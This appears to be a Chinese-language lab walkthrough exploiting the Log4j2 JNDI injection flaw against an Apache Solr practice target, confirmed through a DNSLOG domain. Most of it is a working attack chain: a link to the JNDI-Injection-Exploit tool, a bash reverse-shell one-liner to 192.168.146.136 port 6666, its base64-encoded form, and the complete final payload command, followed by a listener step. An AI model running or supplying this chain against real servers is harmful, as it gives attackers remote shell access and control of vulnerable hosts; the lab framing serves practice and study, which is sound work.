代码执行漏洞-Log4j2漏洞

启动靶场环境

⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果..

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

bash -i >& /dev/tcp/192.168.146.136/6666 0>&1

反弹Shell-base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx

最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.146.136"

服务器监听

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.

相关推荐
SUGERBOOM9 天前
从零开始构建一个JAVA项目
java·开发语言·log4j
酱学编程11 天前
java中的单元测试的使用以及原理
java·单元测试·log4j
m0_7482345213 天前
利用@WebMvcTest测试Spring MVC应用
spring·log4j·mvc
雨 子14 天前
Spring Boot 日志
java·spring boot·后端·log4j
肉三17 天前
使用 JUnit 和 SuiteRunner 测试私有方法
java·junit·log4j
龙猫蓝图19 天前
Java配置log4j日志打印
java·单元测试·log4j
步、步、为营19 天前
Moq与xUnit在C#单元测试中的应用
单元测试·c#·log4j
知初~22 天前
SpringBoot3
java·spring boot·spring·log4j·maven
LXMXHJ23 天前
Java-日志-Slf4j-Log4j-logback
java·log4j·logback
NullPointerExpection24 天前
java 中 main 方法使用 KafkaConsumer 拉取 kafka 消息如何禁止输出 debug 日志
java·kafka·log4j·slf4j